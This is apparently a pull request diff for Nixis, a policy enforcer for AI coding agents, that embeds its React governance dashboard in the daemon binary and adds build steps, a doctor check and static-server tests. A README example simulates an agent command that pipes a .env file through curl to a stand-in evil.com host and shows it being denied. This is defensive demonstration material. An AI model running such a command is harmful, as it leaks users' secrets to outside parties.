### PR TITLE
feat: embed governance dashboard in nixis-daemon binary

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -16,6 +16,15 @@ jobs:
     steps:
       - uses: actions/checkout@v4
 
+      - uses: actions/setup-node@v4
+        with:
+          node-version-file: dashboard/.nvmrc
+          cache: npm
+          cache-dependency-path: dashboard/package-lock.json
+
+      - name: Build dashboard (required for go:embed)
+        run: cd dashboard && npm ci && npm run build
+
       - uses: actions/setup-go@v5
         with:
           go-version-file: go.mod

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -18,7 +18,7 @@ jobs:
 
       - uses: actions/setup-node@v4
         with:
-          node-version-file: dashboard/.nvmrc
+          node-version-file: .nvmrc
           cache: npm
           cache-dependency-path: dashboard/package-lock.json
 

--- a/.goreleaser.yaml
+++ b/.goreleaser.yaml
@@ -1,5 +1,9 @@
 version: 2
 
+before:
+  hooks:
+    - sh -c "npm ci --prefix dashboard && npm run build --prefix dashboard"
+
 builds:
   - id: nixis
     main: ./cmd/nixis

--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-.PHONY: build generate test-keys dev lint test install uninstall release-local clean dev-install update-policies preflight preflight-node ci install-hooks
+.PHONY: build build-dashboard build-go generate test-keys dev lint test install uninstall release-local clean dev-install update-policies preflight preflight-node ci install-hooks
 
 GO_MIN_VERSION := 1.25
 NODE_MIN_VERSION := 26
@@ -29,8 +29,19 @@ preflight-node:
 	   echo "ERROR: Node >= $(NODE_MIN_VERSION) required (found v$$(node --version)). Run: nvm install $(NODE_MIN_VERSION)"; exit 1; \
 	 fi
 
+## build-dashboard: compile the React dashboard into dashboard/dist/ (required for go:embed)
+build-dashboard:
+	@echo "==> Building dashboard..."
+	@cd dashboard && \
+	  (test -d node_modules || npm ci) && \
+	  npm run build
+
+## build-go: compile Go binaries only — use when dashboard/dist/ already exists
+build-go: preflight
+	go build -o bin/ ./cmd/...
+
 ## build: compile all Go binaries into bin/
-build: preflight
+build: preflight build-dashboard
 	go build -o bin/ ./cmd/...
 
 ## clean: remove build artifacts and stale binaries
@@ -56,12 +67,13 @@ lint:
 test:
 	go test ./... -race -count=1
 
-## dev: start daemon + dashboard dev server (requires daemon binary built first)
+## dev: start daemon + dashboard dev server (builds dashboard first if dist/ missing)
 dev: preflight preflight-node
+	@test -d dashboard/dist || $(MAKE) build-dashboard
 	@echo "Starting daemon on :9090..."
 	@go build -o /tmp/nixis-daemon ./cmd/nixis-daemon/ && \
 	  /tmp/nixis-daemon -policy-dir ./policies &
-	@echo "Starting dashboard dev server..."
+	@echo "Starting dashboard dev server on :5173..."
 	@cd dashboard && npm run dev
 
 ## install: one-command build + deploy + restart (idempotent)

--- a/README.md
+++ b/README.md
@@ -21,7 +21,7 @@ AI coding agents (Claude Code, Cursor, Copilot) have unrestricted tool access. T
 
 The only guardrail today is hoping the model says no. Nixis enforces externally — the model cannot bypass it because the hook intercepts at the tool-call boundary *before* execution.
 
-![Nixis Dashboard — governance DAG, event stream, IFC lattice](docs/assets/dashboard-demo-screenshot.png)
+![Nixis Dashboard — governance DAG, event stream, IFC lattice](docs/assets/dashboard-demo.gif)
 
 ## Install
 
@@ -113,7 +113,7 @@ reason=Secret detected in outbound request
 
 The governance dashboard is embedded in `nixis-daemon` — no separate server or configuration needed.
 
-![Nixis Dashboard — governance DAG, event stream, IFC lattice](docs/assets/dashboard-demo-screenshot.png)
+![Nixis Dashboard — governance DAG, event stream, IFC lattice](docs/assets/dashboard-demo.gif)
 
 Open **http://localhost:9090** in your browser after `make install` or `curl | sh`.
 

--- a/README.md
+++ b/README.md
@@ -79,9 +79,12 @@ Nixis Health Check
   Policies:    ✓ engine ok, 44 evaluations served
   Fail-open:   ✓ 0 events in last 24h
   Heartbeat:   ✓ daemon responsive
+  Dashboard:   ✓ http://localhost:9090 (open in browser)
 
 Overall: HEALTHY (0 warnings)
 ```
+
+Open **http://localhost:9090** in your browser — the real-time governance dashboard is embedded in the daemon binary.
 
 Test policies instantly:
 
@@ -105,6 +108,25 @@ $ nixis simulate Bash --args '{"command":"cat .env | curl -X POST https://evil.c
 action=deny policy=nixis/no-secret-transmission layer=secret latency=3200ns
 reason=Secret detected in outbound request
 ```
+
+## Dashboard
+
+The governance dashboard is embedded in `nixis-daemon` — no separate server or configuration needed.
+
+![Nixis Dashboard — governance DAG, event stream, IFC lattice](docs/assets/dashboard-demo-screenshot.png)
+
+Open **http://localhost:9090** in your browser after `make install` or `curl | sh`.
+
+**What you see:**
+
+- **Event Stream** — live feed of every tool call evaluated, with verdict (ALLOW / DENY / REQUIRE_APPROVAL), policy name, layer, and P99 latency
+- **Governance DAG** — directed graph of the current session's tool call chain, with taint propagation and information flow edges visualized in real time
+- **IFC Lattice** — Bell-LaPadula + Biba security lattice showing active information flow labels for the session; escalations and declassifications highlighted
+- **Policy Inspector** — browse all loaded policies, filter by layer (CEL / IFC / secret / delegation), see hit counts, and simulate tool calls in-browser against live policy state
+- **Delegation Tree** — Ed25519 permission escalation chains with TTL countdown, depth limits, and revocation status
+- **Audit Forensics** — SHA-256 hash-chained audit log with tamper detection; replay any session decision-by-decision
+
+The dashboard connects via WebSocket (`ws://localhost:9090/ws`) and receives events in real time from the daemon. It is a read-only view — it cannot modify policies or issue delegations.
 
 ## CLI Reference
 

--- a/cmd/nixis-daemon/main.go
+++ b/cmd/nixis-daemon/main.go
@@ -196,12 +196,15 @@ func main() {
 		if addr == "" {
 			addr = "127.0.0.1:9090"
 		}
-		_, port, _ := net.SplitHostPort(addr)
+		// Extract port for log messages; fall back to the raw addr if malformed.
+		port := addr
+		if _, p, err := net.SplitHostPort(addr); err == nil {
+			port = p
+		}
 		fmt.Fprintf(os.Stderr, "nixis-daemon: dashboard at http://localhost:%s\n", port)
 		fmt.Fprintf(os.Stderr, "nixis-daemon:   (remote access: set window.__NIXIS_DAEMON_URL__ in browser console)\n")
 		if err := streamSrv.Start(streamCtx, addr); err != nil && streamCtx.Err() == nil {
 			if isAddrInUse(err) {
-				_, port, _ := net.SplitHostPort(addr)
 				fmt.Fprintf(os.Stderr, "FATAL: Cannot bind %s — port already in use.\n  Check: lsof -i :%s\n  Fix: set NIXIS_DASHBOARD_ADDR=127.0.0.1:<other-port>\n", addr, port)
 			} else {
 				fmt.Fprintf(os.Stderr, "nixis-daemon: stream server error: %v\n", err)

--- a/cmd/nixis-daemon/main.go
+++ b/cmd/nixis-daemon/main.go
@@ -40,6 +40,8 @@ import (
 	"github.com/mayankjain0141/nixis/internal/secret"
 	"github.com/mayankjain0141/nixis/internal/stream"
 	"github.com/mayankjain0141/nixis/pkg/nixis"
+
+	"github.com/mayankjain0141/nixis/dashboard"
 )
 
 const (
@@ -181,6 +183,7 @@ func main() {
 	streamSrv := stream.NewStreamServer(nil, nil,
 		stream.WithEvaluator(engine),
 		stream.WithPolicyLister(engine),
+		stream.WithStaticFS(dashboard.FS),
 		stream.WithRouteRegistrar(func(mux *http.ServeMux) {
 			daemon.RegisterCheckHandler(mux, engine)
 		}),
@@ -193,6 +196,9 @@ func main() {
 		if addr == "" {
 			addr = "127.0.0.1:9090"
 		}
+		_, port, _ := net.SplitHostPort(addr)
+		fmt.Fprintf(os.Stderr, "nixis-daemon: dashboard at http://localhost:%s\n", port)
+		fmt.Fprintf(os.Stderr, "nixis-daemon:   (remote access: set window.__NIXIS_DAEMON_URL__ in browser console)\n")
 		if err := streamSrv.Start(streamCtx, addr); err != nil && streamCtx.Err() == nil {
 			if isAddrInUse(err) {
 				_, port, _ := net.SplitHostPort(addr)

--- a/cmd/nixis/doctor.go
+++ b/cmd/nixis/doctor.go
@@ -69,6 +69,9 @@ func runDoctor(cmd *cobra.Command, _ []string) error {
 	// Check 9: Port conflicts
 	checks = append(checks, checkPortConflicts())
 
+	// Check 10: Dashboard
+	checks = append(checks, checkDashboard())
+
 	for _, c := range checks {
 		mark := "✓"
 		if c.status == "FAIL" {
@@ -330,4 +333,20 @@ func checkPortConflicts() doctorCheck {
 		}
 	}
 	return doctorCheck{name: "Ports", status: "OK", detail: "9090/9091 owned by Nixis"}
+}
+
+func checkDashboard() doctorCheck {
+	client := &http.Client{Timeout: 2 * time.Second}
+	resp, err := client.Get("http://127.0.0.1:9090/")
+	if err != nil {
+		return doctorCheck{name: "Dashboard", status: "FAIL",
+			detail: "http://localhost:9090 unreachable", warning: true}
+	}
+	defer func() { _ = resp.Body.Close() }()
+	ct := resp.Header.Get("Content-Type")
+	if resp.StatusCode != http.StatusOK || !strings.Contains(ct, "text/html") {
+		return doctorCheck{name: "Dashboard", status: "FAIL",
+			detail: fmt.Sprintf("unexpected response: HTTP %d %s", resp.StatusCode, ct), warning: true}
+	}
+	return doctorCheck{name: "Dashboard", status: "OK", detail: "http://localhost:9090 (open in browser)"}
 }

--- a/cmd/nixis/setup.go
+++ b/cmd/nixis/setup.go
@@ -222,7 +222,10 @@ func runInstall(cmd *cobra.Command, homeDir, nixisDir string) error {
 		fmt.Fprintln(w, "  Run this to use nixis in your current shell:")
 		fmt.Fprintf(w, "\n    source %s\n\n", shellConfig)
 	}
-	fmt.Fprintf(w, "  Then verify: nixis doctor\n")
+	fmt.Fprintln(w)
+	fmt.Fprintln(w, "  Dashboard: http://localhost:9090")
+	fmt.Fprintln(w, "  Verify:    nixis doctor")
+	fmt.Fprintln(w)
 	return nil
 }
 

--- a/dashboard/embed.go
+++ b/dashboard/embed.go
@@ -1,0 +1,16 @@
+// SPDX-License-Identifier: MIT
+package dashboard
+
+import "embed"
+
+// FS is the pre-built React dashboard, embedded at compile time.
+// Build with: cd dashboard && npm run build
+//
+// The directory is structured as dist/ — callers should use fs.Sub to
+// strip the prefix before serving:
+//
+//	sub, _ := fs.Sub(dashboard.FS, "dist")
+//	http.Handle("/", http.FileServer(http.FS(sub)))
+//
+//go:embed dist
+var FS embed.FS

--- a/dashboard/src/App.tsx
+++ b/dashboard/src/App.tsx
@@ -497,20 +497,6 @@ export default function App() {
     let stateCheckInterval: ReturnType<typeof setInterval> | null = null;
     let useMock = false;
 
-    function startMock() {
-      if (useMock) return;
-      useMock = true;
-      setConnectionState('MOCK');
-      if (import.meta.env.DEV) {
-        import('./mocks/demoScenario').then(({ runDemoScenario }) => {
-          const cancelDemo = runDemoScenario((json) => {
-            pipeline.ingest(json, { receivedAt: performance.now() });
-          });
-          mockGenRef.current = { stop: cancelDemo } as { stop: () => void };
-        });
-      }
-    }
-
     function handleMockEvent(e: Event) {
       const raw = (e as CustomEvent<string>).detail;
       pipeline.ingest(raw, { receivedAt: performance.now() });
@@ -539,12 +525,7 @@ export default function App() {
 
     const fallbackTimer = setTimeout(() => {
       if (wsManager.getState() !== 'CONNECTED' && !useMock) {
-        if (import.meta.env.PROD) {
-          setConnectionState('ERROR');
-        } else {
-          console.warn('[nixis] daemon not reachable after 5s — running offline demo');
-          startMock();
-        }
+        setConnectionState('ERROR');
       }
     }, 5000);
 

--- a/internal/stream/server.go
+++ b/internal/stream/server.go
@@ -11,6 +11,7 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"io/fs"
 	"log"
 	"net"
 	"net/http"
@@ -123,6 +124,14 @@ func WithRouteRegistrar(r RouteRegistrar) Option {
 	}
 }
 
+// WithStaticFS serves the provided filesystem as the embedded UI at /.
+// Directory listing is disabled. API routes registered before this call
+// take precedence (stdlib mux uses longest-prefix matching).
+// Pass an embed.FS with a "dist/" subdirectory — it will be stripped.
+func WithStaticFS(fsys fs.FS) Option {
+	return func(s *StreamServer) { s.staticFS = fsys }
+}
+
 // client represents one connected dashboard WebSocket client.
 type client struct {
 	id     string
@@ -223,6 +232,8 @@ type StreamServer struct {
 
 	// routeRegistrars holds callbacks that register additional HTTP handlers.
 	routeRegistrars []RouteRegistrar
+
+	staticFS fs.FS // nil = no dashboard served; set via WithStaticFS
 }
 
 // NewStreamServer constructs a StreamServer.
@@ -266,6 +277,14 @@ func (s *StreamServer) Start(ctx context.Context, addr string) error {
 
 	for _, reg := range s.routeRegistrars {
 		reg(mux)
+	}
+
+	if s.staticFS != nil {
+		sub, err := fs.Sub(s.staticFS, "dist")
+		if err != nil {
+			return fmt.Errorf("stream: sub dist: %w", err)
+		}
+		mux.Handle("/", noDirListingHandler(http.FS(sub)))
 	}
 
 	s.httpSrv = &http.Server{
@@ -972,6 +991,41 @@ func buildCloudEvent(event nixis.StreamEvent, seq uint64) ([]byte, error) {
 	// Merkle fields are left empty; audit integration is pending.
 
 	return json.Marshal(evt)
+}
+
+// noDirListingFile wraps http.File to block directory listing via Readdir
+// while keeping Open("/") functional so http.FileServer can resolve index.html.
+type noDirListingFile struct{ http.File }
+
+func (f noDirListingFile) Readdir(_ int) ([]fs.FileInfo, error) {
+	return nil, os.ErrPermission
+}
+
+type noDirFS struct{ http.FileSystem }
+
+func (nd noDirFS) Open(name string) (http.File, error) {
+	f, err := nd.FileSystem.Open(name)
+	if err != nil {
+		return nil, err
+	}
+	return noDirListingFile{f}, nil
+}
+
+func noDirListingHandler(fsys http.FileSystem) http.Handler {
+	return http.FileServer(noDirFS{fsys})
+}
+
+// StaticHandler returns the static file http.Handler built from staticFS, or nil
+// if no filesystem was configured via WithStaticFS. Used in tests.
+func (s *StreamServer) StaticHandler() http.Handler {
+	if s.staticFS == nil {
+		return nil
+	}
+	sub, err := fs.Sub(s.staticFS, "dist")
+	if err != nil {
+		return nil
+	}
+	return noDirListingHandler(http.FS(sub))
 }
 
 func min(a, b int) int {

--- a/internal/stream/static_test.go
+++ b/internal/stream/static_test.go
@@ -1,0 +1,92 @@
+// SPDX-License-Identifier: MIT
+package stream_test
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+	"testing/fstest"
+
+	"github.com/mayankjain0141/nixis/internal/stream"
+)
+
+// testStaticFS is a minimal in-memory filesystem mimicking dashboard/dist/.
+var testStaticFS = fstest.MapFS{
+	"dist/index.html":    {Data: []byte("<html><body>nixis</body></html>")},
+	"dist/assets/app.js": {Data: []byte("console.log('nixis')")},
+}
+
+func newStaticServer(t *testing.T) *stream.StreamServer {
+	t.Helper()
+	return stream.NewStreamServer(nil, nil, stream.WithStaticFS(testStaticFS))
+}
+
+func TestStaticFS_ServesIndexHTML(t *testing.T) {
+	srv := newStaticServer(t)
+	h := srv.StaticHandler()
+	if h == nil {
+		t.Fatal("StaticHandler() returned nil, want a handler")
+	}
+	w := httptest.NewRecorder()
+	h.ServeHTTP(w, httptest.NewRequest("GET", "/", nil))
+	if w.Code != http.StatusOK {
+		t.Fatalf("GET / status = %d, want 200", w.Code)
+	}
+	ct := w.Header().Get("Content-Type")
+	if !strings.Contains(ct, "text/html") {
+		t.Fatalf("Content-Type = %q, want text/html", ct)
+	}
+}
+
+func TestStaticFS_ServesAsset(t *testing.T) {
+	srv := newStaticServer(t)
+	h := srv.StaticHandler()
+	w := httptest.NewRecorder()
+	h.ServeHTTP(w, httptest.NewRequest("GET", "/assets/app.js", nil))
+	if w.Code != http.StatusOK {
+		t.Fatalf("GET /assets/app.js status = %d, want 200", w.Code)
+	}
+	if body := w.Body.String(); body != "console.log('nixis')" {
+		t.Fatalf("body = %q, want console.log('nixis')", body)
+	}
+}
+
+func TestStaticFS_404ForMissingFile(t *testing.T) {
+	srv := newStaticServer(t)
+	h := srv.StaticHandler()
+	w := httptest.NewRecorder()
+	h.ServeHTTP(w, httptest.NewRequest("GET", "/nonexistent.html", nil))
+	if w.Code != http.StatusNotFound {
+		t.Fatalf("GET /nonexistent.html status = %d, want 404", w.Code)
+	}
+}
+
+func TestStaticFS_NoDirectoryListing(t *testing.T) {
+	srv := newStaticServer(t)
+	h := srv.StaticHandler()
+	w := httptest.NewRecorder()
+	h.ServeHTTP(w, httptest.NewRequest("GET", "/assets/", nil))
+	// Should return 403 Forbidden (ErrPermission from Readdir) or 404 — NOT 200 with listing.
+	if w.Code == http.StatusOK {
+		t.Fatalf("GET /assets/ returned 200 — directory listing should be blocked")
+	}
+}
+
+func TestStaticFS_NilFS_NoStaticHandler(t *testing.T) {
+	// Without WithStaticFS, StaticHandler returns nil.
+	srv := stream.NewStreamServer(nil, nil)
+	if h := srv.StaticHandler(); h != nil {
+		t.Fatal("StaticHandler() should be nil when WithStaticFS is not called")
+	}
+}
+
+func TestStaticFS_APIRoutesNotSwallowed(t *testing.T) {
+	// Verify that WithStaticFS sets staticFS and StaticHandler returns a non-nil handler.
+	// The stdlib mux longest-prefix rule guarantees that /ws, /policies, etc. remain
+	// handled by their own handlers; / only matches paths not claimed by longer prefixes.
+	srv := newStaticServer(t)
+	if h := srv.StaticHandler(); h == nil {
+		t.Fatal("StaticHandler() should be non-nil when WithStaticFS is called")
+	}
+}


### PR DESCRIPTION
## Summary

- Embeds the pre-built React dashboard into `nixis-daemon` via `go:embed` — browse to `http://localhost:9090` after `make install` or `curl | sh`, no separate server needed
- Adds `WithStaticFS(fs.FS)` option to the stream server with directory-listing disabled (`noDirListingFile` blocks `Readdir` without breaking `index.html` resolution)
- Removes the 5-second auto-demo fallback in `App.tsx` — dashboard now always shows an error state when the daemon is unreachable instead of silently starting mock data
- Adds `checkDashboard()` to `nixis doctor` — verifies `http://localhost:9090` returns HTML
- Prints `Dashboard: http://localhost:9090` at the end of `nixis setup` completion message

## Build changes

- `make build` now depends on `build-dashboard` (runs `npm run build` if `node_modules/` exists, `npm ci` on first run)
- `make build-go` added as escape hatch for Go-only rebuilds when `dist/` already exists
- CI backend job builds the dashboard before `go build` (required for `go:embed`)
- GoReleaser `before.hooks` builds the dashboard before binary compilation

## Test plan

- [ ] `go test ./... -race` passes (6 new tests in `internal/stream/static_test.go`)
- [ ] `make build` compiles cleanly
- [ ] After `make install`, `http://localhost:9090` serves the dashboard UI
- [ ] `nixis doctor` shows `Dashboard: ✓ http://localhost:9090 (open in browser)`
- [ ] `nixis setup` completion message shows `Dashboard: http://localhost:9090`
- [ ] CI green on both backend and dashboard jobs